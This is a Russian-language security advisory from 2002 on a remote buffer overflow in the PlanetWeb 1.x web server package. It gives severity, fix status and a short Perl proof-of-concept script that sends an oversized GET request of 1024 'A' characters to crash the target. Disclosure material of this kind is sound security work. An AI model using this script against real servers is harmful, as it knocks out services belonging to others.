Security Lab

Переполнение буфера в PlanetWeb

Дата публикации:18.09.2002
Всего просмотров:1150
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PlanetWeb 1.x
Описание: PlanetWeb – коммерческий пакет программ, позволяющий создавать Web сайт непосредственно на вашем компьютере.

GET запрос, содержащий более 1024 символов, приведет к аварийному заверщению работы программы. Уязвимость может использоваться для выполнения произвольного кода.

Эксплоит:

#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 vulnurable_server 
..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => "http(80)",
                                  );
unless ($remote) { die "cannot connect to http daemon on 
$host" }
$xblp = "A" x 1024;
$exploit = "GET /".$xblp." HTTP/1.0\n\n";
$remote->autoflush(1);
print $remote $exploit;
close $remote;
Уязвимость обнаружена в PlanetWeb Software v1.14
Ссылки: Planet Web Software Buffer Overflow